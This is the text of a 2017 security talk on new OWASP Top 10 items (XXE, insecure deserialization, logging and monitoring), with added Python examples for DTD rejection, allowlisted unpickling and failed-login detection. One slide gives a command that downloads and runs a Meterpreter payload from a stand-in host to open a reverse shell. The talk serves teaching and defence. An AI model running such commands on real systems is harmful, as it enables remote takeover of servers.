New OWASP Top 10 Items - 2017
Stephen Deck, GSE, OSCE, CISSP
@ranger_cha
BE INFORMED. BE STRATEGIC. BE SECURE.
Objective
- OWASP Top 10 Update
- XML eXternal Entity (XXE) Background
- XXE Defense and Attacks
- Deserialization Background
- Deserialization Defense and Attacks
- New Deserialization Research
- Logging & Monitoring
2017 OWASP Top 10
OWASP Top 10 2017
Source: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
XML eXternal Entity (XXE)
What is XXE?
- XML eXternal Entity (XXE)
- XML is not just for data storage
- It is possible to supply a Document Type Definition (DTD)
- The DTD can be used to create programmatic elements (entities)
- Those entities are then referenced from the XML body
- DTD processing is often enabled by default
- Code execution MAY be possible
XXE Defenses
- Do not allow DTDs
- In PHP, do not allow expect (the expect:// stream wrapper)
- Maybe don’t use PHP?
- That’s pretty much it.
XML Format
XML POST
XML with an External Entity
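The "Do not allow DTDs" defense from the XXE Defenses slide, as an added example that is not part of the talk. It uses only the Python standard library: expat reports the DOCTYPE before any entity in it is declared or resolved, so refusing the document at that point blocks external entities (file or network reads) and internal entity-expansion tricks alike. The two request bodies at the bottom are constructed for the demonstration; the `file:///path/on/server` URI is a placeholder, not a real target.

```python
import xml.parsers.expat
from xml.etree.ElementTree import TreeBuilder, Element


class DtdRejected(ValueError):
    """Raised when a document carries a DOCTYPE or entity declaration."""


def parse_without_dtd(data: bytes) -> Element:
    """Parse XML into an ElementTree Element, refusing any DTD.

    Expat calls StartDoctypeDeclHandler as soon as it sees <!DOCTYPE ...>,
    before any entity inside the DTD exists, so raising there stops the
    document before an external entity can be fetched or expanded.
    """
    builder = TreeBuilder()
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} is not allowed")

    def reject_entity(*_args):
        raise DtdRejected("entity declarations are not allowed")

    def reject_external_ref(*_args):
        # Belt and braces: never resolve an external entity reference.
        raise DtdRejected("external entity reference is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external_ref
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def check_xml(data: bytes):
    """Return ("ok", root) or ("rejected", reason) for an incoming request body."""
    try:
        return "ok", parse_without_dtd(data)
    except DtdRejected as exc:
        return "rejected", str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return "rejected", f"malformed XML: {exc}"


# Constructed sample bodies (not taken from the talk).
BENIGN = b'<?xml version="1.0"?><order><id>42</id><item>widget</item></order>'

# A DTD that declares an external entity and references it in the body;
# the SYSTEM URI is a placeholder.
WITH_EXTERNAL_ENTITY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY ext SYSTEM "file:///path/on/server">]>'
    b'<order><id>&ext;</id></order>'
)

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("external entity", WITH_EXTERNAL_ENTITY)]:
        status, detail = check_xml(body)
        print(label, "->", status, detail if status == "rejected" else detail.tag)
```

Rejecting at the DOCTYPE rather than trying to distinguish "safe" from "unsafe" entity declarations keeps the rule simple and matches the slide's advice: an application that only exchanges data has no business accepting a DTD at all.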
Insecure Deserialization
Serialization from the beginning…
- What is an object? A collection of values that works as a single unit
Serialization from the beginning…
- The process of preparing objects for storage or network transport
- Also called marshalling
- What does serialization look like?
Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
Deserialization
- Deserialization is the reverse of serialization
- Usually from a readObject call (in Java)
- Common in many languages
- An attacker forces the server to load an unexpected object
- Often that executes arbitrary code
Malicious Objects
Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Deserialization: How do you fix it?
- Upgrade for…
- Blacklisting???
- Noooo
- Hard to write signatures
Pickle Deserialization
- https://blog.nelhage.com/2011/03/exploiting-pickle/
- Look for deserialization calls
Pickle Deserialization: Exploit Class
- Create a class that executes code when created
Pickle: Send Exploit
- Send the exploit to the server
- How depends on the app
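The "How do you fix it?" slide says blacklisting is hard; the pickle slides show why, since any class whose `__reduce__` names a callable becomes a gadget. This added example (not from the talk) shows the allowlist alternative in Python: a `pickle.Unpickler` subclass whose `find_class` resolves only the `(module, name)` pairs the application legitimately needs, so an unexpected callable is refused before it is invoked. The `Gadget` class stands in for the slide's "class that executes code when created", but the callable it names is a harmless marker function defined here; the payload bytes, the allowlist contents and the order data are all constructed for the demonstration.

```python
import datetime
import io
import pickle

# Only these globals may be reconstructed from untrusted bytes. Plain dicts,
# lists, strings and numbers need no global lookup at all, so a small explicit
# list covers everything this (hypothetical) application actually serializes.
ALLOWED_GLOBALS = {
    ("datetime", "date"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted (module, name) pairs."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        # Refused here, before pickle can call the named object.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def load_trusted(data: bytes):
    """Deserialize with the allowlist; raises UnpicklingError on anything else."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_load(data: bytes):
    """Return ("ok", obj) or ("rejected", reason) for use at a request boundary."""
    try:
        return "ok", load_trusted(data)
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


# --- constructed demonstration data ---------------------------------------
SIDE_EFFECTS = []


def side_effect(marker):
    """Harmless stand-in for the dangerous callable a real gadget would name."""
    SIDE_EFFECTS.append(marker)
    return marker


class Gadget:
    """A class that "executes code when created": __reduce__ tells pickle to
    call side_effect(...) instead of rebuilding a Gadget instance."""

    def __reduce__(self):
        return (side_effect, ("gadget ran",))


LEGIT_PAYLOAD = pickle.dumps({"order_id": 42, "ship_on": datetime.date(2017, 11, 20)})
GADGET_PAYLOAD = pickle.dumps(Gadget())


def demo():
    """Plain pickle.loads runs the gadget; the restricted loader refuses it.

    Returns (gadget ran unrestricted, restricted status, gadget ran restricted).
    """
    pickle.loads(GADGET_PAYLOAD)            # unrestricted: side_effect is called
    ran_unrestricted = "gadget ran" in SIDE_EFFECTS
    SIDE_EFFECTS.clear()
    restricted = try_load(GADGET_PAYLOAD)   # restricted: refused in find_class
    ran_restricted = "gadget ran" in SIDE_EFFECTS
    return ran_unrestricted, restricted[0], ran_restricted


if __name__ == "__main__":
    print(try_load(LEGIT_PAYLOAD))
    print(demo())
```

The same idea is what Java's `ObjectInputFilter` and similar serialization filters provide: enumerate the handful of classes the application expects rather than chase every new gadget. Where the format cannot be constrained this way, the slide's advice stands: look for the deserialization call and replace it with a data-only format.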
Deserialization in Java
- Look for raw Java objects
- Find a suitable gadget (an object that runs code when loaded)
- Must be an object the app understands
- ysoserial provides several gadgets: https://github.com/frohoff/ysoserial
Deserialization in Java
- Vulnerable app: https://github.com/hvqzao/java-deserialize-webapp
- Includes Apache Commons Collections
- The ysoserial exploit only runs one command
- Reverse shell in three commands: wget IP/meterpreter; chmod +x meterpreter; ./meterpreter
Deserialization in Java Example
No Java Objects?
- Safe without Java objects?
- Moar gadgets: https://github.com/mbechler/marshalsec
- Same idea, different format
- JSON, XML
Jackson Deserialization
Insufficient Logging and Monitoring
Insufficient Logging & Monitoring
- Ensure defenders can identify attacks and investigate incidents
- 191 days to identify a breach
- Requires blue team participation
- Kind of awkward for AppSec testing
- Cannot run a zero-involvement “Top 10” test
Source: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&
Insufficient Logging & Monitoring
- Things to log:
  - Failed & successful authentication attempts
  - Software errors
  - Security tool alerts
  - Sensitive actions (money transfers, password changes)
- Logs must be aggregated
- Blue teams should alert
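The "things to log", "logs must be aggregated" and "blue teams should alert" points from the slide above, as an added example that is not part of the talk. The first function writes each security event as one JSON line with fixed field names (so an aggregator can search them uniformly); the second is a detection run over the aggregated lines that flags an actor with a burst of failed authentications inside a sliding window. The event names, field names, thresholds and the sample events (actors, timestamps, 203.0.113.x / 198.51.100.x documentation addresses) are all constructed for the demonstration.

```python
import json
import logging
from collections import defaultdict
from datetime import datetime, timedelta, timezone

log = logging.getLogger("security")


def security_event(event, actor, source_ip, outcome, ts=None, **details):
    """Emit one JSON log line with fixed field names and return it.

    event:   auth | password_change | transfer | app_error | tool_alert (constructed names)
    outcome: success | failure
    ts:      event time (defaults to now, UTC); passed explicitly for the samples
    """
    record = {
        "ts": (ts or datetime.now(timezone.utc)).isoformat(timespec="seconds"),
        "event": event,
        "actor": actor,
        "src_ip": source_ip,
        "outcome": outcome,
        **details,
    }
    line = json.dumps(record, sort_keys=True)
    log.info(line)
    return line


def failed_auth_bursts(lines, threshold=5, window=timedelta(minutes=10)):
    """Detection over aggregated JSON lines: {actor: peak count} for every actor
    with at least `threshold` failed auth events inside any `window`-long span."""
    failures = defaultdict(list)
    for line in lines:
        rec = json.loads(line)
        if rec.get("event") == "auth" and rec.get("outcome") == "failure":
            failures[rec["actor"]].append(datetime.fromisoformat(rec["ts"]))

    alerts = {}
    for actor, times in failures.items():
        times.sort()
        start = 0                      # left edge of the sliding window
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[actor] = max(alerts.get(actor, 0), count)
    return alerts


# --- constructed sample log, as an aggregator would hold it ----------------
_base = datetime(2017, 11, 20, 9, 0, tzinfo=timezone.utc)
SAMPLE_LINES = []
for i in range(6):  # six failures for alice within three minutes
    SAMPLE_LINES.append(security_event("auth", "alice", "203.0.113.7", "failure",
                                       ts=_base + timedelta(seconds=30 * i)))
SAMPLE_LINES.append(security_event("auth", "alice", "203.0.113.7", "success",
                                   ts=_base + timedelta(minutes=4)))
SAMPLE_LINES.append(security_event("transfer", "alice", "203.0.113.7", "success",
                                   ts=_base + timedelta(minutes=5), amount=2500, currency="USD"))
SAMPLE_LINES.append(security_event("auth", "bob", "198.51.100.2", "failure", ts=_base))
SAMPLE_LINES.append(security_event("auth", "bob", "198.51.100.2", "failure",
                                   ts=_base + timedelta(hours=2)))  # two hours apart: no burst

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(message)s")
    for line in SAMPLE_LINES:
        print(line)
    print("alerts:", failed_auth_bursts(SAMPLE_LINES))
```

Note that a successful login and a money transfer right after a burst of failures is exactly the sequence an investigator needs to be able to reconstruct, which is only possible because the success and the sensitive action were logged alongside the failures with the same actor and source fields.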
Summary
- The OWASP Top 10 now includes three new vulns: XXE, Deserialization, Insufficient Logging & Monitoring
- Fix XXE by disallowing DTDs
- “Fix” Deserialization by blacklisting classes (need patch)
- Fix logging and monitoring by… logging and monitoring
- Need client support to test
References
- New OWASP Top 10 (2017): https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
- Example XXE App: https://github.com/jbarone/xxelab
- Setup RMI Object: http://zerothoughts.tumblr.com/post/137769010389/fun-with-jndi-remote-code-injection
- Deserialization Resources: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md
- Marshalling Pickles: http://frohoff.github.io/appseccali-marshalling-pickles/
- ysoserial: https://github.com/frohoff/ysoserial
- Deserialization – Different marshallers: https://github.com/mbechler/marshalsec
- Pickle Deserialization: https://blog.nelhage.com/2011/03/exploiting-pickle/
- Java Deserialization app: https://github.com/hvqzao/java-deserialize-webapp
- Jackson Deserialization: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Questions?
www.directdefense.com